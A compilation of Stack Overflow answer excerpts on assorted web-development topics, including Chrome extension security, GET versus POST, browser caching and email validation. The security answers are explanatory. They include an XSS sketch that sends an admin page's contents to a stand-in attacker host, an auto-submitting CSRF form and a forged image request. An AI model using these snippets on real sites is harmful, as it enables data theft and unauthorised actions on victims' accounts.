If you don't want the receiving user to have to install an app, you could send an SMS with a link to a website you control that uses web geolocation APIs to report position: http://dev.w3.org/geo/api/spec-source.html

The user will need to click the link in the SMS, then they will be prompted to allow the page to access their location. This will work not only on Android devices, but on any device with a browser that supports these APIs
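
In case it helps, here is a minimal sketch of what the linked page could do with the Geolocation API; the /report endpoint and the payload format are made up for illustration:

// Runs on the page the SMS links to. The /report endpoint is hypothetical;
// replace it with whatever your server expects.
if ("geolocation" in navigator) {
  navigator.geolocation.getCurrentPosition(function (pos) {
    // Send the coordinates back to a server you control.
    fetch("/report", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        lat: pos.coords.latitude,
        lon: pos.coords.longitude,
        accuracy: pos.coords.accuracy
      })
    });
  }, function (err) {
    console.log("Location denied or unavailable: " + err.message);
  });
}

The user still has to accept the permission prompt before the success callback ever fires.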

android - Request for permission to access location trough SMS? - Stac...

android geolocation notifications sms

Google chooses when Sitelinks are shown for a website. You have no control over when that happens. It usually only happens when a website is very popular and a very obvious choice for a very popular search term.

If your site does qualify for Sitelinks, you can suggest pages you do not want to appear as Sitelinks in Google Webmaster Tools. But this is only a suggestion, and the option only becomes available after Google has started showing Sitelinks for your site.

sub sitelinks in google search result - Stack Overflow

google-search

It's not a good idea to just grab a copy of the page's code that does this.

Consider: you get a Content Security Policy error, because you're trying to execute a piece of code from a remote server. While you can relax the policy, let me first explain why this is a security problem.

Currently, your code loads http://dota2.cyborgmatt.com/prizetracker/data/ti4.json and executes its contents, without verifying what they are. Right now it looks like this:

populatePrizePool({"dollars":3129676});

Remember that this is a website you do not control.

Imagine: you write your extension, it becomes popular, admins of the site notice the unusual traffic, change their code to load http://dota2.cyborgmatt.com/prizetracker/data/ti4_.json instead, and after a bit of googling replace the original link's contents with this:

alert("By the way, Ramana Venkata is stealing our data. Sincerely, cyborgmatt.com");

And suddenly, your extension doesn't work, you have an angry mob of users, and are slightly embarrassed.

You see the problem? It could be worse, as the replacement code can be as evil as JS permits. Since HTTP traffic is trivial to intercept, it doesn't even take cyborgmatt.com admins to inject arbitrary code in your extension, and that is why it's not even possible to relax the policy in this way.

Now, to solve the problem. Instead of AJAX-loading that code and executing it, you should load the file as plain text, extract the JSON data from it (i.e. {"dollars":3129676}), safely parse and validate that data, and only then use it. This way, if the above scenario happens, at least nothing evil comes of it.

Step 1: Get the data.

Replace the $.ajax call with XHR:

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
  if (xhr.readyState == 4) {
    parseAndValidate(xhr.responseText);
  }
};
xhr.open("GET", "http://dota2.cyborgmatt.com/prizetracker/data/ti4.json", true);
xhr.send();

Step 2: Parse and validate the data.

You have a string that you expect to have the format populatePrizePool(SOME_JSON);, and you expect the JSON data to contain a non-negative number dollars.

function parseAndValidate(str){
  var some_json;

  // First, extract `SOME_JSON` with a regular expression:
  var match = str.match(/populatePrizePool\((.*)\);/);
  if (match) {
    some_json = match[1];
  } else {
    throw Error("Unexpected format for ti4.json");
  }

  // Second, _safely_ parse `some_json`:
  var data = JSON.parse(some_json); // Will throw an exception if something's not right

  // Third, ensure that the JSON has the required data
  // (check `typeof` first, so a legitimate value of 0 is not rejected):
  if (typeof data.dollars !== "number" || data.dollars < 0) {
    throw Error("Unexpected data format for ti4.json");
  }

  // Finally, call the function:
  populatePrizePool(data);
}

This may be a little overkill for your tiny project, but it's a learning experience. Do not blindly trust data you don't control, let alone code you don't control.

browser action - Refused to load script in Chrome Extension - Stack Ov...

google-chrome-extension browser-action

The GET request is marginally less secure than the POST request. Neither offers true "security" by itself; using POST requests will not magically make your website secure against malicious attacks by a noticeable amount. However, using GET requests can make an otherwise secure application insecure.

The mantra that you "must not use GET requests to make changes" is still very much valid, but this has little to do with malicious behaviour. Login forms are the ones most sensitive to being sent using the wrong request type.

Search spiders will follow every link on your website, but will not submit random forms they find. This is the real reason you should use POST requests for changing data.

Web accelerators are worse than search spiders, because they run on the client's machine and "click" all links in the context of the logged-in user. Thus, an application that uses a GET request to delete stuff, even if it requires an administrator, will happily obey the orders of the (non-malicious!) web accelerator and delete everything it sees.

The only scenario in which POST is slightly less susceptible is that many websites that aren't under the attacker's control (say, a third-party forum) allow embedding arbitrary images (allowing the attacker to inject an arbitrary GET request), but prevent all ways of injecting an arbitrary POST request, whether automatic or manual.
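
To make that concrete, here is roughly what "embedding an image" amounts to; the URL is made up, and the same request fires if the image is embedded as plain HTML in a forum post:

// Anyone viewing the attacker's post issues this GET request with their
// own cookies attached; no interaction is needed. The URL is fictional.
var img = new Image();
img.src = "http://victim-site.example/admin/delete?id=12";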

One might argue that web accelerators are an example of a confused deputy attack, but that's just a matter of definition. If anything, a malicious attacker has no control over this, so it's hardly an attack, even if the deputy is confused.

Proxy servers are likely to log GET URLs in their entirety, without stripping the query string. POST request parameters are not normally logged. Cookies are unlikely to be logged in either case.

This is a very weak argument in favour of POST. Firstly, un-encrypted traffic can be logged in its entirety; a malicious proxy already has everything it needs. Secondly, the request parameters are of limited use to an attacker: what they really need is the cookies, so if the only thing they have are proxy logs, they are unlikely to be able to attack either a GET or a POST URL.

There is one exception for login requests: these tend to contain the user's password. Saving this in the proxy log opens up a vector of attack that is absent in the case of POST. However, login over plain HTTP is inherently insecure anyway.

Caching proxies might retain GET responses, but not POST responses. Having said that, GET responses can be made non-cacheable with less effort than converting the URL to a POST handler.

If the user were to navigate to a third party website from the page served in response to a GET request, that third party website gets to see all the GET request parameters (via the Referer header).

Belongs to the category of "reveals request parameters to a third party", whose severity depends on what is present in those parameters. POST requests are naturally immune to this; however, to exploit the GET request a hacker would need to insert a link to their own website into the server's response.

This is very similar to the "proxy logs" argument: GET requests are stored in the browser history along with their parameters. The attacker can easily obtain these if they have physical access to the machine.

The browser will retry a GET request as soon as the user hits "refresh". It might do that when restoring tabs after shutdown. Any action (say, a payment) will thus be repeated without warning.

The browser will not retry a POST request without a warning.

This is a good reason to use only POST requests for changing data, but has nothing to do with malicious behaviour and, hence, security.

  • If your site performs sensitive operations, you really need someone who knows what they're doing, because this can't be covered in a single answer. You need to use HTTPS, HSTS, CSP, and mitigate SQL injection, script injection (XSS), CSRF, and a gazillion other things that may be specific to your platform (like the mass assignment vulnerability in various frameworks: ASP.NET MVC, Ruby on Rails, etc.). There is no single thing that will make the difference between "secure" (not exploitable) and "not secure".

Over HTTPS, POST data is encoded, but could URLs be sniffed by a 3rd party?

No, they can't be sniffed. But the URLs will be stored in the browser history.

Would it be fair to say the best practice is to avoid placing sensitive data in the POST or GET altogether, and to use server-side code to handle sensitive information instead?

Depends on how sensitive it is, or more specifically, in what way. Obviously the client will see it. Anyone with physical access to the client's computer will see it. The client can spoof it when sending it back to you. If those matter then yes, keep the sensitive data on the server and don't let it leave.

ahem, CSRF is just as possible with POST.

@Lotus Notes, it is very slightly more difficult, but you do not need any kind of XSS. POST requests are being sent all the time all over the place, and don't forget that a CSRF request can be sourced from any website, no XSS needed.

No, you have to make somebody else with privileges submit it, as opposed to a GET, which will be silently fetched by the browser. Considering that every POST form should be protected with a verifiable source hash, and there's no such means for a GET link, your point is silly.

Well, you could add a hash to all your GET requests exactly the same way you add them to POST forms... But you should still not use GET for anything that modifies data.

Using POST over GET doesn't prevent any kind of CSRF. It just makes them slightly harder to do, since it's easier to get people to visit a random website that allows images from URLs than a website that you control (enough to have JavaScript). Doing <body onload="document.getElementById('a').submit()"><form id="a" action="http://example.com/delete.php" method="post"><input type="hidden" name="id" value="12"></form> isn't really that hard, and it submits a POST automatically as soon as somebody opens a page containing that HTML.

html - Is either GET or POST more secure than the other? - Stack Overf...

html security http

Sometimes, it's also possible to use XSS as a vector to trigger and leverage Cross-Site Request Forgery (CSRF) attacks.

Having an XSS on a website is like having control over the JavaScript a user will execute when visiting it. If an administrator stumbles upon your XSS code (either because you sent them a malicious link or by means of a stored XSS), then you might get him or her to execute requests or actions on the webserver that a normal user wouldn't have access to. If you know the webpage layout well enough, you can request webpages on the visitor's behalf (backends, user lists, etc.), and have the results sent (exfiltrated) anywhere on the Internet.
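
As a deliberately simplified sketch (both URLs are made up for illustration), the injected script could look something like this:

// Runs in the victim's browser: fetch a page only they can access and
// forward its contents to a host the attacker controls. Both URLs are fictional.
fetch("/admin/users", { credentials: "include" })
  .then(function (resp) { return resp.text(); })
  .then(function (html) {
    fetch("https://attacker-collect.example/log", { method: "POST", body: html });
  });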

You can also use more advanced attack frameworks such as BeEF to attempt to exploit vulnerabilities in your visitor's browser. If the visitor in question is a website administrator, this might yield interesting information to further attack the webserver.

XSS per se won't allow you to execute code on the server, but it's a great vector for leveraging other vulnerabilities present in the web application.

security - Can XSS be executed on server? - Stack Overflow

security xss

EDIT 2014: For what it's worth, a lot of the info in this answer is no longer correct - see comments.

With Windows Azure Websites, you don't have control over IIS or the web server, because you are using a slice of resources on a machine shared with hundreds of other websites. You share resources like everyone else, so there is no control over IIS.

The big difference between a shared website and an Azure web role is that a website is considered process-bound, while roles are VM-bound.

Websites are stored on a content share which is accessible from all the "web servers" in the farm, so no replication or anything like that is required.

Windows Azure websites cannot have their own host name; they must use websitename.azurewebsites.net. You can use a CNAME record at your DNS provider to route requests, exactly as with a previous Windows Azure role, but only when the site is running in reserved mode. CNAME settings are not supported for shared websites.

I believe for WA Web Sites, only apps running with reserved instances (dedicated VMs) are able to have custom domains mapped to them.

For what it's worth, a lot of the info in this answer is no longer correct (though it was in June 2012): Web Sites can now have custom domains. Web sites can run in a "reserved" mode, which is essentially a VM, but completely managed.

What is the difference between an Azure Web Site and an Azure Web Role...

azure azure-web-roles azure-web-sites

I'm not sure whether I should just copy/paste from a website, but I'd rather leave the answer here, instead of a link. If anyone can clarify in comments, I'll be much obliged.

Basically, you have to extend the WebBrowser class.

public class ExtendedWebBrowser : WebBrowser
{
    bool renavigating = false;

    public string UserAgent { get; set; }

    public ExtendedWebBrowser()
    {
        DocumentCompleted += SetupBrowser;

        //this will cause SetupBrowser to run (we need a document object)
        Navigate("about:blank");
    }

    void SetupBrowser(object sender, WebBrowserDocumentCompletedEventArgs e)
    {
        DocumentCompleted -= SetupBrowser;
        SHDocVw.WebBrowser xBrowser = (SHDocVw.WebBrowser)ActiveXInstance;
        xBrowser.BeforeNavigate2 += BeforeNavigate;
        DocumentCompleted += PageLoaded;
    }

    void PageLoaded(object sender, WebBrowserDocumentCompletedEventArgs e)
    {

    }

    // BeforeNavigate2 fires before each navigation. Cancel the original
    // request and re-issue it with the User-Agent header appended.
    void BeforeNavigate(object pDisp, ref object url, ref object flags, ref object targetFrameName,
        ref object postData, ref object headers, ref bool cancel)
    {
        if (!string.IsNullOrEmpty(UserAgent))
        {
            if (!renavigating)
            {
                headers += string.Format("User-Agent: {0}\r\n", UserAgent);
                renavigating = true;
                cancel = true;
                Navigate((string)url, (string)targetFrameName, (byte[])postData, (string)headers);
            }
            else
            {
                renavigating = false;
            }
        }
    }
}

Note: To use the method above you'll need to add a COM reference to Microsoft Internet Controls.

The original author mentions your approach too, and states that the WebBrowser control seems to cache the user agent string, so it will not change the user agent without restarting the process.

The link is invalid now. So yes, nearly two years later, copying and pasting turned out to be the right thing to do :)

@zourtney, heh it paid off in the end!

Is there still a way to do this? Apparently the WPF variant of WebBrowser is sealed and can't be used this way.

BeforeNavigate2 does not fire if the control is hosted in a .NET application: support.microsoft.com/kb/325079

SHDocVw.WebBrowser xBrowser = (SHDocVw.WebBrowser)ActiveXInstance

c# - Changing the user agent of the WebBrowser control - Stack Overflo...

c# winforms webbrowser-control user-agent

Since you are in full control of the website and the extension, you could use externally_connectable to enhance your website. This manifest key allows code on your website to initiate and maintain a communication channel between the website and your extension. Then you can implement the platform-independent parts (e.g. UI with HTML & CSS) in your website, delegate the Chrome-specific parts to the extension, and use the messaging API to communicate between the page and extension.
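
A rough sketch of the moving parts, assuming a placeholder extension ID and a made-up message format:

// manifest.json (extension side): allow your site to open the channel.
// "externally_connectable": { "matches": ["https://www.example.com/*"] }

// On the website: send a message to the extension (the ID is a placeholder).
var extensionId = "abcdefghijklmnopabcdefghijklmnop";
chrome.runtime.sendMessage(extensionId, { action: "doChromeThing" }, function (response) {
  console.log("Extension replied:", response);
});

// In the extension's background script: handle messages from the page.
chrome.runtime.onMessageExternal.addListener(function (message, sender, sendResponse) {
  if (message.action === "doChromeThing") {
    // ...do the Chrome-specific work here...
    sendResponse({ ok: true });
  }
});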

The warning that users receive will be less scary:

  • Communicate with cooperating websites

If your extension doesn't need to run on the website, but only needs to be able to send HTTP requests to your website (e.g. via an API), then you could add CORS headers to the website to allow the extension to make requests.
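
For example (a sketch only, with a placeholder extension ID), a Node.js endpoint could allow the extension's origin like this:

// Minimal Node.js server that lets the extension call the API.
// The extension ID in the allowed origin is a placeholder.
var http = require("http");

http.createServer(function (req, res) {
  res.setHeader("Access-Control-Allow-Origin",
                "chrome-extension://abcdefghijklmnopabcdefghijklmnop");
  res.setHeader("Access-Control-Allow-Methods", "GET, POST");
  res.setHeader("Access-Control-Allow-Headers", "Content-Type");
  res.end(JSON.stringify({ ok: true }));
}).listen(8080);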

You could also use optional permissions to support new sites via content scripts. With this method, Chrome doesn't show any warnings upon installation. A disadvantage of this method is that your users have to approve another permission request before they can use your extension on your website.

google chrome extension - How to remove the permission warning "Read a...

google-chrome-extension

While deciding which characters are allowed, please remember your apostrophed and hyphenated friends. I have no control over the fact that my company generates my email address using my name from the HR system. That includes the apostrophe in my last name. I can't tell you how many times I have been blocked from interacting with a website by the fact that my email address is "invalid".

This is a super common problem in programs that make unwarranted assumptions about what is and is not allowed in a person's name. One should make no such assumptions; just accept any character that the relevant RFC(s) say one must.
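
One deliberately loose way to act on that advice, as a sketch: check only the rough shape of the address and leave strict validation to the mail server.

// A deliberately permissive check: one "@", something on each side, no
// whitespace. Apostrophes and hyphens pass without complaint.
var permissiveEmail = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;

console.log(permissiveEmail.test("miles.o'brien@example.com"));      // true
console.log(permissiveEmail.test("anne-marie.smith@example.co.uk")); // true
console.log(permissiveEmail.test("not an email"));                   // false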

regex - Using a regular expression to validate an email address - Stac...

regex email email-validation string-parsing

In general, caching is good. So there are a couple of techniques, depending on whether you're fixing the problem for yourself as you develop a website, or whether you're trying to control caching in a production environment.

General visitors to your website won't have the same experience that you're having when you're developing the site. Since the average visitor comes to the site less frequently (maybe only a few times each month, unless you're Google or hi5 Networks), they are less likely to have your files in cache, and that may be enough. If you want to force a new version into the browser, you can always add a query string to the request and bump up the version number when you make major changes:

<script src="/myJavascript.js?version=4"></script>

This will ensure that everyone gets the new file. It works because the browser looks at the URL of the file to determine whether it has a copy in cache. If your server isn't set up to do anything with the query string, it will be ignored, but the name will look like a new file to the browser.

On the other hand, if you're developing a website, you don't want to change the version number every time you save a change to your development version. That would be tedious.

So while you're developing your site, a good trick would be to automatically generate a query string parameter:

<!-- Development version: -->
<script>document.write('<script src="/myJavascript.js?dev=' + Math.floor(Math.random() * 100) + '"\><\/script>');</script>

Adding a query string to the request is a good way to version a resource, but for a simple website this may be unnecessary. And remember, caching is a good thing.

It's also worth noting that the browser isn't necessarily stingy about keeping files in cache. Browsers have policies for this sort of thing, and they are usually playing by the rules laid down in the HTTP specification. When a browser makes a request to a server, part of the response is an EXPIRES header: a date which tells the browser how long the file should be kept in cache. The next time the browser comes across a request for the same file, it sees that it has a copy in cache and looks to the EXPIRES date to decide whether it should be used.

So believe it or not, it's actually your server that is making that browser cache so persistent. You could adjust your server settings and change the EXPIRES headers, but the little technique I've written above is probably a much simpler way for you to go about it. Since caching is good, you usually want to set that date far into the future (a "Far-future Expires Header"), and use the technique described above to force a change.
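
If you do want to go the server route, here is a sketch of what that could look like in Node.js (the file name and cache lifetime are just examples):

// Serve a script with a far-future cache lifetime; pair it with the
// ?version=N trick above so a new URL busts the cache when you deploy.
var http = require("http");
var fs = require("fs");

http.createServer(function (req, res) {
  if (req.url.indexOf("/myJavascript.js") === 0) {
    res.setHeader("Content-Type", "application/javascript");
    res.setHeader("Cache-Control", "public, max-age=31536000"); // one year
    res.setHeader("Expires", new Date(Date.now() + 31536000000).toUTCString());
    fs.createReadStream("myJavascript.js").pipe(res);
  } else {
    res.statusCode = 404;
    res.end();
  }
}).listen(8080);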

If you're interested in more info on HTTP or how these requests are made, a good book is "High Performance Web Sites" by Steve Souders. It's a very good introduction to the subject.

The quick trick of generating a query string with JavaScript works great during active development. I did the same thing with PHP.

This is the easiest way of accomplishing the original poster's desired result. The mod_rewrite method works well if you want to force a reload of the .css or .js file EVERY time you load the page. This method still allows caching until you actually change the file and really want it to force reload.

The version query string does not work for me in Chrome.

@keparo, I have many jQuery references across all the pages; if I change this manually it will take a month. Can you help me solve this for all of them without editing each page?

I've tried this solution with different browsers: adding a version number at the end of the JS file URL. Interestingly, Opera 25.0, Firefox 34.0 and Chrome 39.0.2171.65 will NOT keep the file in cache as soon as there is a version number at the end, even if the number does not change. IE 11.0 and Safari 5.1.7 work as expected, though.

javascript - How to force browser to reload cached CSS/JS files? - Sta...

javascript css caching auto-versioning